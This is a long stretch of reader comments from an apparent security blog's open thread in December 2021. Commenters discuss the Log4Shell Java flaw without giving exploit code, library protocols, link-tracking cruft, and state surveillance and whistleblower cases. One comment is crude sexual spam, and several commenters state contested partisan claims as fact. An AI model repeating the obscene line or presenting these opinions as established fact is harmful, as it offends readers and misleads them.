I managed to extricate my involvment with Z3950 even though “Bath” in the UK is a nice place to visit and I was friendly with people at the Ubiversity, when “librarian types” started pushing to have “SQL” added as “minor functionality” along with a few other DB protocols. Trying to resolve just the “attribute to indexing problem”[1] resulted in a committee of it’s own that later became the “Bath protocol”. Which as there is an expression in the UK to represent failure of “Taking a bath” so you can imagine how the protocol got spoken of.

That was in effect an “easy” problem to articulate and comprehend, but there are deeper dangers than circling sharks to worry about.

Having at the time been looking at not just “Wide Area Information Services”(WAIS) databases but “Wide Area Distributed Environment Services”(WADES) database design I knew just how crazy things would get at a very fundemental level[2].

Librarians who realy are some of the politest people you would care to meet and are very tollerent of what many consider “strange notions” especially those who work in universities, do have there limits though… Imagine if you can the strange looks you get even from them when you start talking about “CRUD and Time Cones”…

I’m not sure of the current state of Z3950 as I’ve avoided it since the turn of this century. But a look into the history of it and WAIS might give “fore warning” of “maelstroms ahead”.

[1] The “attribute to indexing problem” is very very simple to describe and should likewise be to resolve, but… in practice is hellishly dificult to impossible to resolve in any real world practical reality, and makes the strugles of “internationalization” look like childs play. You want to carry out a simple search so you “search” first gets turned into a set of “attributes”, these then at the individual databases have to be turned into a local “search” to generate “indexing” for the query before the query can even run. OK simple monotonic information like an ISBN number can be handled fairly painlessly, but what about an “author” there are many ways just names exist and can be stored and that’s before you have to find ways to differentiate half a hundred “J Smiths”.

[2] People often do not ubderstand the difference between what WAIS wanted to do and what they could achieve and what a true WADES. In short WAIS was a client ontop “of many issolated” databases, where as WADES is a client ontop “of an integrated distributed” database (ie effectively “one” massive database consisting of many parts). With many issolated databases consistency is a “local” issue thus resolvable, in a “global” database to do consistancy you have to solve a few fundemental things that include “relativity” as they have to do in GPS and Mobile phone networks and in the case of “consistancy” the fun of “time cones”

Ted December 12, 2021 6:53 AM

@Winter, ALL

What’s your take on this?

“Netherlands Says Armed Forces May Combat Ransomware Attacks”

the way in which the Dutch are handling the nonstate actor problem is significant.

[…] Effectively, this seemingly indicates that military use is a legal option because a failure to take action on ransomware actors operating from your borders is no different than actually sponsoring the action,” notes Williams, a former member of the U.S. National Security Agency’s elite hacking team.

https://www.govinfosecurity.com/netherlands-says-armed-forces-may-combat-ransomware-attacks-a-17703

Freezing_in_Brazil December 12, 2021 9:09 AM

@ Clive, JonKnowsNothing

I’m fairly certain I don’t need FireFox and have not for years…

Firefox is for kids. Real men [and women] browse the web in Emacs! [:wink]. 🙂

Winter December 12, 2021 10:52 AM

@Ted
“Netherlands Says Armed Forces May Combat Ransomware Attacks”

Not sure what to make of this. Have not heard about it yet.

In general, if no one is shot, there are few barriers, if any, for the army for helping the civil sector.

Currently in the news, the army helps securing our maximal security prison against a suspected mercenary breakout attempt. They caught and put on trial a drugs kingpin who made a lot of money and is also a homicidal maniac. It is quite likely he is capable and willing to fly in a mercenary attack force to try to free him.

So, military assistance against ransomware attacks would not be problematic at all, I think.

Winter December 12, 2021 10:55 AM

@Supremes
“Christian nationalism”

Note that “Christian nationalism” is a euphemism/stage name for White Supremacists.

lurker December 12, 2021 11:54 AM

@Ted, @NicholasWeaver, @All

Java has a design flaw in it: It has a lot of complexity and the ability to load random pieces of code and execute them. […] And, of course, there are a lot of toolkits already available to take advantage of this class of vulnerability simply because it is such a common problem in Java systems.

I remember saying when Java landed on our plates that this would end badly. I admire @Clive continually reminding us how we repeat history. I gave up saying ‘I told you so’ when I became aware of the sign on my back ‘Old Man Shouting at Clouds’.

Commercial software like Java suffers from multiple layers of historical amnesia. At the lower levels new coders join the project unaware of historical mistakes; at the top the imperative to get product to market deliberately ignores historical mstakes. It’s the human condition, we cannot avoid death, taxes, and bad software.

whoopsi silverburg December 12, 2021 12:35 PM

I used to masturbate to pac-man, hoping he would chomp me it felt very real and very sexual

Clive Robinson December 12, 2021 12:45 PM

@ ResearcherZero,

Re : Listening to privileged conversations…

As you know a Spanish Organisation –alleged to have “official connections”– bugged the ladies toilet at a,certain Embasy in London UK.

The reason was privileged communications between a “guest in the Embasy” and his legal team.

When the “guest” was dragged away he was put in a situation where it was not possible for him to have “privileged communications” this was not just aided but actively encorraged by the person running the court he was imprisoned in without benift of having council present.

A witness to what occured inside the Embasy with regards the bugging etc who was going to testify in Court was given Eight Months in “hard” Prison on trumped up political charges in Scotland, which “conveniently” stopped him being able to testify in Spain.

The man is in his sixties and whilst he has a young child he is also not in anyway robust in health.

As for the “guest” I think you know who I’m talking about, they have tried just about everything to not just destroy his mind but by reprated medical negligence his health as well.

But don’t bother looking in the MSM, the UK Guardian newspaper, has sold it’s soul to the UK security forces via the Editor some time ago with some of the journalists obviously being “fed stories”…

Other UK MSM mentions nothing about what has been described by several experts and a UN Raportor as “tourture” being carried out…

Recent legaslitive changes have all but made even peacful protest a criminal offence, with draconian punishments.

All at the behest of “the whilly waver in chief” who is trying to sell the UK to the US as a new state, presumably so he can have a shot at being US Pres (yup he was born in NY and is over 35, as for the sound in mind and moral terpitude[1]… Your guess[2]

[1] Black’s Law,Dictionary has defined Moral turpitude as,

“An act of baseness, vileness, or depravity in the private duties which a man owes his fellow men, or to society in general, contrary to the accepted and customary rule of right and duty between man and woman, or conduct contrary to justice, honesty, modesty, or good morals.”

Definately sounds like BoJo is hooked on more than one barb there.

[2] In the early 1990’s a Supreme Court ruled that,

“moral turpitude is not involved in every criminal act.”

But it went on to say,

“moral turpitude is somewhat a vague and indefinite term, the meaning of which must be left to the process of judicial inclusion or exclusion as the cases are reached.”

So does BoJo get a “pass” because of “The Caesar’s Wife Principle”?

Clive Robinson December 12, 2021 1:03 PM

@ SupremeL, name.withheld…, ResearcherZero, Winter,

Regards the observed “growing threat”, yes it is a National Security threat up on the highest scale.

There are three or four people who have been warning about it here about as politely as you can get for several years now… Trouble is things have a habit of disapearing…

I suspect it’s going to start building up come the New Year as the US start running into election season. Not sure if it will come fully to a head, or wait untill 2024 when certain folks will almost certainly not be holding hands and singing Kumbaya at candle lit vigials anylonger.

Ted December 12, 2021 1:10 PM

@lurker, ALL

Re: Log4Shell and Nicholas Weaver’s article

I gave up saying ‘I told you so’ when I became aware of the sign on my back ‘Old Man Shouting at Clouds’.

You are too funny! 😆

But apparently you, Clive, and Bruce were all onto something. It looks like Bruce wrote about the critical need for safe and secure software following the SolarWinds hack. And here, as Clive would say, is history repeating itself.

I am grateful that @Nicholas Weaver made his article so readable, so that people with varying degrees of technical sophistication could still generally understand the issues going on.

I think it was positive that he mentioned the Software Bill of Materials (SBOM) before giving his final thoughts:

There is often talk about the need for a software bill of materials (SBOM) in systems. A SBOM is a machine-readable list of all external components including libraries, the libraries used by those libraries, and so-on. A recent executive order, in fact, mandated SBOMs for government purchased systems.

During all this craziness, at least people can have hope that there is a possible path forward to ameliorate these hard reality slaps.

It seems like that has a great potential to help move the whole community in the right direction.

Clive Robinson December 12, 2021 2:01 PM

@ ALL,

Crap in news feeds…

As an experiment a “google news feed” link was obtained and sent to me,

https://amp-theguardian-com.cdn.ampproject.org/v/s/amp.theguardian.com/money/2021/dec/11/south-western-left-my-16-year-old-son-stranded-at-a-locked-unstaffed-station?amp_js_v=a6&amp_gsa=1&usqp=XXXXXXXXXXXXXXXXXXX%3D#aoh=XXXXXXXXXXXXXXXX&csi=1&referrer=https%3A%2F%2Fwww.google.com&amp_tf=From%20%251%24s&ampshare=https%3A%2F%2Fwww.theguardian.com%2Fmoney%2F2021%2Fdec%2F11%2Fsouth-western-left-my-16-year-old-son-stranded-at-a-locked-unstaffed-station

As you can see a lot of “cruft” some of which I’ve replaced with “X”.

Now previously with Google links just chopping off everything after the “?” was sufficient. However some one wrote a script to do that. So Google retaliated and now you get left with,

https://amp-theguardian-com.cdn.ampproject.org/v/s/amp.theguardian.com/money/2021/dec/11/south-western-left-my-16-year-old-son-stranded-at-a-locked-unstaffed-station

Which gives you an error at Google with demands you prove you are “human” etc…

So what you need to do is strip out the “amp” crap I’ve highlighted and replace it with “www” to finally get,

https://www.theguardian.com/money/2021/dec/11/south-western-left-my-16-year-old-son-stranded-at-a-locked-unstaffed-station

Which as they say “Is one heck of a difference”

Now… If someone wanted to find a real use for “Machine Intelligence” as a worthwhile project, “de-googling” etc might fit the bill

I wonder if they would let you do it as part of one of their “Summer of Code” events or similar 😉

Clive Robinson December 12, 2021 3:55 PM

@ ALL,

With regards Nicholas Weaver’s article a niggle…

As a person who was writing low level code in CPUs[1] in the early 1980’s as well as for 8 bit and 16 bit CPUs and microcontrolers I have a lot of quite painful programing experience that is such I get twinges when ever the wind blows or the sun shines…

Which is why Nicholas Weaver’s,

“The first rule of being a good programmer is don’t reinvent things. Instead we re-use code libraries, packages of previously written code that we can just use in our own programs to accomplish particular tasks.”

As they say “Has given me a dose of the hives”…

I do not disagree with the “don’t reinvent” it’s sound advice with one proviso… Any alternative is “sound” and mostly they are not…

So “re-use” is frequently “baf advice” as in this occasion.

For those with longer memories that have been hanging around on this blog, they may remember the protracted series of conversations on “Castles-v-Prisons” I had with @Nick P and later @Wael who renamed it “CvP”.

I went into some length as to why “code re-use” was a bad idea especially inside of organisations where the managment emphasis is generally on “code out the door” rather than thoughtful “code quality”.

Anyone involved with Standards will tell you just how much thought and care went into the C libraries simply because those involved back then actually understood the dangers of “Code re-use”. Something that for various reasons the current industry apparently does not care about.

Any way as I pointed out with “CvP” the tendency today is not to write code but plumb libraries together. In a not to disimilar way to that older *nix bods used to “Hack a rapid prototype” using Shell Scripting and lots of little *nix utilities.

My point was that from a security asspect there were actual advantages If the utilities/tasklets were written by experts

Not just hacked together in a hurry for one job, then augmented over and over for every job there after. Like trying to get a blind bicycle maker to work towards something suitable for a fish and squid to ride in tandem…

I’m sure others will have their own view on this…

But as Nicholas Weaver has said, spare a thought for all those through no fault of their own are having to wrestle this bug out of code they probably know next to nuthing about…

Oh and don’t “Hate on Nebraska” after all somebody has to live there or it wouldn’t exist (though rumour has it, it was invented as a decoy in a cornfield in some war, and nobody got around to knocking it down in 1861 ;-),

[1] That is for code to go inside a CPU at one level it’s called “microcode” but at the next layer down it’s called “Register Transfer Language”(RTL) not to be confused with several other RTL’s

Such is the shortage of “Three Letter Acronyms”(TLAs) that reuse is guarenteed… And reuse is always a problem hence this comment…

SpaceLifeForm December 12, 2021 4:48 PM

@ Clive

re; Crap in news feeds…

Interesting.

Sent to you via iPhone?

Sent to you from across the pond?

Ted December 12, 2021 5:23 PM

@Clive, SpaceLifeForm, ALL

Re: Article URLs (and their ‘crap’)

This is really weird.

The first super gnarly link let’s me access the whole article. The last, more elegant link, puts the article behind a request for registration.

Also South Western Railway was really putting some major numb-skullery on display.

South Western’s staff did not check whether any passengers were vulnerable before abandoning them.

And the alley-oop from the rail regulator, the Office of Rail and Road:

”The Consumer Rights Act gives rail passengers the ability to seek statutory redress if a train operator fails to provide a passenger service with reasonable care and skill.”

What a collective gasp there must have been from parents and loved ones.

Clive Robinson December 12, 2021 5:37 PM

@ lurker,

I gave up saying ‘I told you so’ when I became aware of the sign on my back ‘Old Man Shouting at Clouds’.

I used to have a sign like that…

Only it had “Beware” at the front of it a double “o” and I held a 12 Gauge to my shoulder, and whilst pigeon pie was not assured, my frustration levels dropped fast than the beta blockers would have worked on “angry man” :-S

Whilst I can’t say it would work for every one there is something kind of relaxing even just blowing holes in paper targets at the range, just to keep my eye in 😉

lurker December 12, 2021 5:43 PM

@Clive, @SLF, re crap urls

I’ve noticed that recently just copy/paste a news link from a G search page to a document on my own machine. Scripting a cure for it is submitting to G breaking the web. The cure is to not use G. It’s a pity they seem to be more up to date and more comprehensive on news search…

Clive Robinson December 12, 2021 5:47 PM

@ Ted,

The last, more elegant link, puts the article behind a request for registration.

Turn off javascript and cookies and try again 😉

As a rule of thumb…

If you see a web page load then one of those anoying “you have to say yes to being data raped” screens pops up, it’s probably launched by javascript in your browser so disabling javascript makes your life so much faster and less irritating.

You would have thought any half way sensible browser designer who had not been bought of by Google, the add industry or simiar would have added a “click to dismiss” button by now… Or make a javascript off button in the frame.

Clive Robinson December 12, 2021 5:56 PM

@ SpaceLifeForm,

Sent to you via iPhone?

Err no a phone emulator runing inside a container on an isolated windows box in a lab somewhere “Narph Lundon Way”.

Ted December 12, 2021 6:05 PM

@Clive

Turn off javascript and cookies and try again 😉

Oh man. I feel like I’m being called to the principal’s office.

Thanks, though, that worked 😭

SpaceLifeForm December 12, 2021 6:59 PM

@ lurker, Ted, Clive, ALL

Re: crap URLs

It is wierder than you may think.

I am just paying attention, connecting dots, and thinking outside of the box.

You all have seen a link change colour after clicking on the link, right?

Have you ever seen part of the link change colour on a link you never clicked on? Not starting with the http[s]// ?

2nd link, ampersand to ampersand. I slightly lie about the characters under study here.

Clive, we need more info. What platform sent you the link? Are we sure your redaction really was sufficient?

Obviously, the sender did not open in new tab, and then send you that link.

As I said, Interesting. Especially the two parameters you did not redact.

Are they 7-bit ASCII, or some UTF-8 that my minds eye can not discern?

ResearcherZero December 12, 2021 8:17 PM

@Clive Robinson

““Machine Intelligence” as a worthwhile project, “de-googling” etc might fit the bill”

This certainly would be a great project.

I’ve been wondering if google is running experiments with making payment to news organisations, the most annoying experience possible?
If the news organisations don’t then get paid, it’s the fault of ad-blockers and extensions, not the fault of google?

@Ted

Australian prisons are indeed victorian. The super-max prisons are probably more dystopian, with a victorian feel.

Gerard van Vooren December 12, 2021 8:56 PM

Do you know about hxxps://gemini.circumlunar.space

I wasn’t aware of Gemini but now I think that I like it enough to look into it a bit more. Thanks a lot!

(it still lacks the forms and pictures, but hey… I like simplicity)

ResearcherZero December 12, 2021 9:26 PM

@Ted

The ability of the press to report freely on its government is a cornerstone of American democracy. That ability is, by any reasonable assessment, under siege.

The Times’s executive editor, Jill Abramson, put it simply when I asked her about it Tuesday: “The press is supposed to hold government accountable. These investigations intrude on that process.”

This isn’t just about press rights. It’s about the right of citizens to know what their government is doing. In an atmosphere of secrecy and punishment – despite the hollow promises of transparency — that’s getting harder every day.
https://publiceditor.blogs.nytimes.com/2013/05/14/leak-investigations-are-an-assault-on-the-press-and-on-democracy-too/

“Material cannot be classified to conceal legal violations or prevent embarrassment.”

This bit doesn’t seem to be taken very seriously anymore.

Legal experts say both physical and digital surveillance is worrying, especially when done by a government-owned agency.

“State surveillance comes at a very high democratic cost,” Ms Al-Azzawi says.

“Surveillance violates people’s rights to privacy, and it has a really chilling effect on the exercise of political rights.”

“I think that this kind of surveillance, the fact that it is happening in an unregulated environment, means that we’re all at risk.”
https://www.abc.net.au/news/2021-11-25/victoria-forests-agency-accused-of-spying-on-campaigner/100613342

ResearcherZero December 12, 2021 9:42 PM

@Ted

These spying laws in Australia are also being expanded.

Section 280(1)(b) of the Telecommunications Act enables a range of agencies from councils to the RSPCA and environmental authorities to access telecommunications metadata.

The government said it wants “communication” to encompass “phone calls, emails, instant messages, video conversations and conversations via over-the-top messaging applications”, including “draft emails” and “unsent” IM messages.
https://www.homeaffairs.gov.au/reports-and-pubs/files/electronic-surveillance-framework-discussion-paper.pdf

AN0M “second phase” has begun
https://www.afp.gov.au/news-media/media-releases/operation-ironside-phase-2-land-second-blow-organised-crime

@All

There is some more about Log4js here

The bug lies in Apache Foundation’s open source Struts Log4J logging utility, in version 2.14 and earlier.

A simple to use exploit that can be used for remote code execution and to gain full control over millions of vulnerable enterprise systems.
https://www.lunasec.io/docs/blog/log4j-zero-day/

Log4js is a popular logging library for Java which, due to insecure handling of directory lookups, allows the remote execution of arbitrary code in its default configuration.
https://github.com/sponsors/rgoers

Ted December 12, 2021 9:52 PM

@ResearcherZero

The Times’s executive editor, Jill Abramson, put it simply when I asked her about it Tuesday: “The press is supposed to hold government accountable. These investigations intrude on that process.”

Hold up. Can you expand on that?

ResearcherZero December 12, 2021 9:56 PM

@Ted

Reporters’ phone logs and e-mails were secretly subpoenaed and seized by the Justice Department in two of the investigations, and a Fox News reporter was accused in an affidavit for one of those subpoenas of being “an aider, abettor and/or conspirator” of an indicted leak defendant, exposing him to possible prosecution for doing his job as a journalist. In another leak case, a New York Times reporter has been ordered to testify against a defendant or go to jail.

“I worry now about calling somebody because the contact can be found out through a check of phone records or e-mails,” said veteran national security journalist R. Jeffrey Smith of the Center for Public Integrity, an influential nonprofit government accountability news organization in Washington. “It leaves a digital trail that makes it easier for the government to monitor those contacts,” he said.

The administration’s war on leaks and other efforts to control information are the most aggressive I’ve seen since the Nixon administration, when I was one of the editors involved in The Washington Post’s investigation of Watergate. The 30 experienced Washington journalists at a variety of news organizations whom I interviewed for this report could not remember any precedent.
https://cpj.org/reports/2013/10/obama-and-the-press-us-leaks-surveillance-post-911/

Drake is the guy who best fits the whistle-blower profile: He gave information to a Baltimore Sun reporter who wrote “a prize-winning series of articles for the Sun about financial waste, bureaucratic dysfunction, and dubious legal practices” in the National Security Agency. After years of hounding, the case against Drake fell apart, and he wound up pleading guilty to one misdemeanor. No jail time.

“We have tried more leak cases—brought more leak cases during the course of this administration than any other administration,” Holder said before the Senate Judiciary Committee last year.
https://slate.com/news-and-politics/2013/05/obamas-justice-department-holders-leak-investigations-are-outrageous-and-unprecedented.html

ResearcherZero December 12, 2021 10:20 PM

@Ted

“IMAGINE if American citizens never learned about the abuse of prisoners at Abu Ghraib. Imagine not knowing about the brutal treatment of terror suspects at United States government “black sites.” Or about the drone program that is expanding under President Obama, or the Bush administration’s warrantless wiretapping of Americans.”

“This is a world without leaks.”

“And a world without leaks — the secret government information slipped to the press — may be the direction we’re headed in. Since 9/11, leakers and whistle-blowers have become an increasingly endangered species. Some, like the former C.I.A. official John Kiriakou, have gone to jail.”
https://www.nytimes.com/2013/03/10/public-editor/the-danger-of-suppressing-the-leaks.html

The A.P. said that the Justice Department informed it on Friday that law enforcement officials had obtained the records for more than 20 telephone lines of its offices and journalists, including their home phones and cellphones. It said the records were seized without notice sometime this year.
https://www.nytimes.com/2013/05/14/us/phone-records-of-journalists-of-the-associated-press-seized-by-us.html

This kind of stuff happens in Australia, only I don’t remember there being any requirement to inform anyone that they are pursuant to an order to collect their communications. They may find out when they get a knock on their door and are presented with a seizure order, and paperwork/devices are seized afterwards.

Although the government is expanding the law to encompass “phone calls, emails, instant messages, video conversations and conversations via over-the-top messaging applications”, including “draft emails” and “unsent” IM messages.” under Section 280(1)(b) of the Telecommunications Act…

…communications are already being collected, such as private messages on social media and other communications. Of course you would have to prove your communications have been collected, and the orders are secret.

There is no Bill of Rights in Australia, no Fourth Amendment. Your rights come down to what can be proved on paper, and that evidence may or may not be allowed to be heard at a trial. If you have a large amount of money, the evidence that may increase, depending on who is in charge of the hearing.
I’d recommend having at least a few million spare.

ResearcherZero December 12, 2021 10:26 PM

@Ted

And herein lies the rub. If the case may set a legal precedent, if you lose, everyone may lose.

Ted December 12, 2021 10:38 PM

@ReseacherZero

Hi my friend. What’s the one most pressing topic you are worried about? Pretend I can only process 280 characters at a time. Otherwise I don’t know where to start.

Maybe others will be pulling out things that concern them?

ResearcherZero December 12, 2021 10:51 PM

@Ted

This would be the most pressing topic that concerns me.

“Witness K is an ex-Australian intelligence officer who blew the whistle on the bugging of East Timor that he says occurred in 2004 during talks to carve up lucrative oil and gas reserves.”
https://www.standard.net.au/story/7228569/secret-document-is-key-witness-k-lawyer/

“ASIO officers raided the Canberra office of lawyer for East Timor Bernard Collaery and cancelled the passport for a retired spy expected to give evidence.”
https://www.abc.net.au/news/2013-12-04/asio-arrests-key-witness-in-east-timor-spying-scandal/5132954

ResearcherZero December 12, 2021 10:58 PM

@Ted

The ex-Australian intelligence officer embarrassed the government when he exposed Australia was secretly spying on the East Timor negotiation team during negotiations over East Timor’s oil and gas reserves. Australia also holds money from the gas and oil profits in a Sovereign Wealth Fund, on East Timor’s behalf.

“For 14 years now, Australia’s tiny neighbour, East Timor, has been consistently requesting Australia to negotiate the establishment of permanent maritime boundaries between the two coastlines. For 14 years now, Australia has refused to even consider doing so.”
https://www.standard.net.au/story/7228569/secret-document-is-key-witness-k-lawyer/

“Instead it has jostled East Timor into a series of temporary resource sharing arrangements, all of which short-change one of the poorest countries in Asia out of billions of dollars in oil and gas resources.”
https://www.smh.com.au/opinion/australia-is-guilty-of-the-same-misconduct-as-china-over-our-treatment-of-east-timor-20160713-gq54u0.html

Ted December 13, 2021 12:00 AM

@ResearcherZero, JonKnowsNothing, ALL

Re: Australia–East Timor spying scandal

It looks like @JonKnowsNothing knows something about this, as he mentioned it in squid post back in 2020. Maybe we could phone a friend about this?

https://www.schneier.com/blog/archives/2020/10/friday-squid-blogging-chinese-squid-fishing-near-the-galapagos.html/#comment-356957

“Australia–East Timor spying scandal”
https://en.wikipedia.org/wiki/Australia-East_Timor_spying_scandal

lurker December 13, 2021 12:31 AM

@ResearcherZero: including “draft emails”

For quite some years my “draft emails” have been composed on a basic text editor before connecting to the mail server. I suspect POP or IMAP doesn’t matter. The next task is to follow @Clive into the freedom of no email…

ResearcherZero December 13, 2021 12:54 AM

@Ted

How can anyone report on security lapses if someone from the government decides to come after the individual reporting the security lapse?

“State officials’ best response would have been to take down the site, thank the reporter and immediately begin its own investigation into the data exposure, not to kill the messenger with threats of legal action,”
https://statescoop.com/missouri-parson-reporter-did-nothing-wrong/

There is also generally a requirement to report a crime if you witness it.

“The Afghan police are described beating and harassing civilians; according to one report, when his bodyguard refuses to shoot a civilian, a police chief shoots the bodyguard instead. An orphanage that opened with great fanfare is shown to be empty, the coalition’s money embezzled; the police and Army are described feuding with each other, and insurgents are shown attacking U.S. troops using vehicles supplied by the coalition to fight them.”

“The documents describe the Taliban’s efforts to turn U.S. allies into enemies with bribes and threats and the killing of civilians through mistakes and misunderstanding (a deaf person who flees a convoy out of nervousness can’t hear warnings and gets shot; five children get killed in a rocket attack that was part of a botched raid against an enemy who isn’t present). Also revealed is the wider-than-known use of drones inside Afghanistan and the Taliban’s use of heat-seeking missiles against U.S. aircraft, the very type of weapon that the United Sates supplied to the mujahedeen to defeat the Soviets in the 1980s.”
https://www.cbsnews.com/news/wikileaks-documents-white-house-tries-to-kill-the-messenger/

The WikiLeaks disclosures revealed resource-driven gaps and weaknesses in CIA’sinsider threat program.

“exempting the intelligence community form baseline federal cybersecurity requirements was a mistake.”

From intelligence brief:

“We have been slow-due to resource choices and cultural resistance-to extend state-of-the-art auditing and user activity monitoring technology to mission systems not connected to the main enterprise network.”
https://www.wyden.senate.gov/imo/media/doc/wyden-cybersecurity-lapses-letter-to-dni.pdf

The talk explains and illustrates the procedural and technical details of the surveillance in and around the Ecuadorian embassy in London during the time Julian Assange stayed in there from June 2012 until April 2019.
https://media.ccc.de/v/36c3-11247-technical_aspects_of_the_surveillance_in_and_around_the_ecuadorian_embassy_in_london

In Australia 13 recommendations for changes to the Telecommunications Act remain classified…

“In effect, this bill would allow spy agencies to modify, add, copy or delete your data with a data disruption warrant; collect intelligence on your online activities with a network activity warrant; [and] take over your social media and other online accounts and profile with an account takeover warrant.”
https://www.itnews.com.au/news/police-get-online-account-takeover-data-disruption-powers-569062

“It is outrageous that these warrants won’t come from a judge of a superior court that is appointed on their personal capacity.”
https://parlinfo.aph.gov.au/parlInfo/download/legislation/amend/r6623_amend_49c26454-34c3-45fc-8f54-e837bac45395/upload_pdf/QL187.pdf;fileType=application%2Fpdf

All but four of the 190 unclassified recommendations have been agreed to by the government in full, part or principle, while a further 13 recommendations are classified.
https://www.ag.gov.au/national-security/publications/report-comprehensive-review-legal-framework-national-intelligence-community

Ham radio with a pre-arranged cypher for transmitting messages is starting to sound a lot better than email. Place the antenna so that if someone comes and cuts the support wires, then it falls on a neighbors house. Make sure to catch the offenders on camera.

Ted December 13, 2021 1:09 AM

@ResearcherZero

I am on this forum to enjoy security discussions. There are others who can discuss security matters with you. Thank you.

SpaceLifeForm December 13, 2021 1:45 AM

@ ResearcherZero, Ted

If the case may set a legal precedent, if you lose, everyone may lose.

My observation has been for some time, that there are actors filing vexatious lawsuits, with the sole intent to intentionally lose the case, but to create legal precedent.

The judges and juries are not buying the shtick.

Clive Robinson December 13, 2021 3:13 AM

@ Ted,

@ResearcherZero, has “overloaded” a little, but I can understand why.

Effectively for the entirety of this century we have been spyed upon by our governments, without any kind of restraint.

Contrary to what people think this did not start with “terrorism” it started as the agencies got the capabilities from Boeing, IBM, Cisco, and a few others back last century.

As far as I can tell in the US it picked up under the Clinton tenure though I very much doubt the orders if there even were any came down from the executive.

It all has hallmarks of a “push up and make de facto” rather than an “orders down de jure”.

In short those in the agencies did a land grab on society and have bullied and bribed various people in government to belatedly give those illegal or imoral acts the credence of legality, when in fact they had none.

As @lurker points out I don’t have personal email and gave it up quite some time ago. Back then I looked paranoid to many, with retrospect these days maybe “not so much”.

I also looked paranoid when I started saying why I would not recommend the use of Tor and gave a whole slew of technical reasons. Now people are starting to see and understand why.

I still look paranoid to others because I don’t use “secure messaging Apps” even though I can show without question they are,

1, Insecure in use.
2, A liability to the users.

Why am I capable of seeing these things sometimes more than a decade ahead of time?

Perhaps it’s not that I am some kind of genius, but because I,

“Dare to think evil”.

That is every time I see a new piece of technology due to past experience I think,

“How can this be used to hurt me”.

Then I sit down and work it out and model it or build and test it. I also work out, model, build, and test solutions.

Our host @Bruce used to talk about “thinking hinky” well I do more than “think hinky” I “do hinky” thus I “know capabilities”.

And I do tell people about these “capabilities” but as they say,

“You can lead a horse to water…”

But there is a downside, some prefere to live in ignorance so “shoot the messenger” and have in some cases accused me of “telling the bad guys how to do things”…

Let me put it this way, there is a spectrum of “bad guys” who get “caught out” or you get to see ranging from illegal/immoral to sometimes ethical,

1, The “idiots” you eventually see caught and prosecuted.
2, The “money boys” you see caught out but not prosecuted.
3, The “Guard Labour” you rarely see caught out and are usually legally protected.
4, The “thoughtful” you never see caught out because they carefully don’t get their hands dirty.

Then there are those that are not “bad guys” but many make the mistake of thinking they are,

5, The “researcher” who responsibly issolate their tests, then warns people of the dangers they have found

To many they never see beyond the first type of “bad guy” so fail to see why warning people of “capabilities” is important.

Nor do they understand about the fact “electronic communications is nolonger ephemeral” thus their past is waiting to potentialy haunt them in later life.

So in some respects, these days, when you see a warning it’s already “too late”… But you only find that out years later.

What @ResearcherZero has done is shown you and others what the level 3 and 4 bad guys have been doing that is sufficiently unethical or immoral that people “whistleblow” on them…

Peter A. December 13, 2021 4:56 AM

@someone: re: text browser and image support

lynx/links/w3m + cacaview is one way to go. All nicely packaged in popular Linux distributions, including source tarballs if you care. Some terminal emulator with color xterm support is handy – just select a really small font size and maximize the window, you get a few hundred by a few hundred “pixels” resolution, actually a little more by the virtue of font shape aliasing. If you roll back your chair a few meters from the monitor – looks like a real photo.

name.withheld.for.obvious.reasons December 13, 2021 6:38 AM

@ Clive, SpaceLifeForm, Winter, ResearcherZero, SumpremeL

Thank you Clive for stating the least obvious, seems there is a proclivity to redact to a degree that is a cause of some angst (in my case, more than some). It is so difficult to lift the lid/skirt/covers/seal/veil on this subject area that this comment has loads of seats (from being couched).

There is currently a continuum of activity and action across many channels and spheres of influence that cause concern and suggest that timelines in the neighborhood of months is something of a window. Two parallel tracks, on headlong to the endpoint and the other in discovery. I am afraid the discovery track is sufficiently behind that we might all be considerate of our own OPSEC. Making lists is not just for LEA’s and Santa Claus as we know. Some people just cannot help but want all the marbles, even if they have more than they need.

As discernible from the above diatribe, this is where we find ourselves today. Use this a relativistic marker if you will.

JonKnowsNothing December 13, 2021 8:26 AM

@All

re: A new potential US Legal Process that can be used against MostAnyCo

Background

The USA has 2 main sets of legal systems: Federal which are national laws and State which are laws affecting those inside that state only. There are occasions when State and Federal laws clash. In normal course of legal proceedings Federal laws override State laws. There are currently several high profile cases at the Supreme Court (SCOTUS) about such clashes.

What is important to know that one of the new techniques used by a US State to void a US Federal law has other implications. If SCOTUS does not prohibit this technique it can be used against nearly any corporation, including technology companies.

Method

AState passes ALaw declaring SomeStuff to be illegal in AState.

Under normal laws, enforcement of ALaw would fall to the LEOs of AState.

In this new legal process there is zero enforcement of ALaw by LEOs. It is a law without criminal enforcement.

The enforcement clause is passed to civilians to bring civil charges against SomeStuff providers, manufacturers, retailers, suppliers. It sets the claim amount to the same ceiling of $10,000 used by US Small Claims Courts.

There are no limits to the number of suits, nor the number of re-files, nor the number of claimants.

Normally a person needs to have had some loss(es) to be recovered by a claim. In this situation no personal direct damage thresholds are needed.

To Consider

If this process is permitted to stand by SCOTUS, many laws could be subject to such a redirection of enforcement. Many Tech Companies are shielded from lawsuits by various laws, FB$$, G$$, M$$ and many other types of corporations. Oil and Gas companies, Finance companies nearly any company or individuals can be the recipient of continuous claims of $10,000 each.

As the heat over some of these difficult questions continues and courts render opinions and findings that are unpopular with a portion of the population, this process cuts both ways:

Both

  • to restrict previously protected actions

    and

  • to expand previously prohibited restrictions.

ex:

A Federal court struck down a California ban on certain types of automated firing systems that had been in place for many years.

California plans to use the same technique used by the State of Texas to restrict women’s health choices.

The Texas law allows civilian claims against providers, supporters, suppliers and financing groups, that provide women’s health choices.

The California law would target manufactures, supporters, suppliers and financing groups that make some automated firing systems. Until now all of these groups have been protected by various Federal Laws. (1)

If this becomes common practice, it will take only a State law to target technology companies, manufactures, software providers to continuing claims. $10,000 USD isn’t much but it can be claimed many times, by anyone, in any State.

The USA has an estimated population of 333,791,863.

If everyone of those people file a $10,000 claim against the 10 biggest Tech Companies yielding $100,000 for each set of claims, this that might be new method of social funding.

  33,3791,863 * 100,000 = $33,379,186,300,000

===

1) There are nuances to how the California version would stand in courts. Not all automated firing systems are protected by direct Federal law.

h ttp s://www.me rcuryne ws. com/2021/12/12/legal-experts-respond-to-newsom-modeling-assault-weapon-law-on-texas-abortion-bill/

JonKnowsNothing December 13, 2021 2:52 PM

@All

re: Follow the White Rabbit to $10KClaims

A hypothetical application of civil $10Kclaims enforcement when applied to tech firms

Consider

  • There are existing definitions of harmful explicit content
  • Corporations employ many people to screen out such content
  • LEAs also employ many people to screen such content

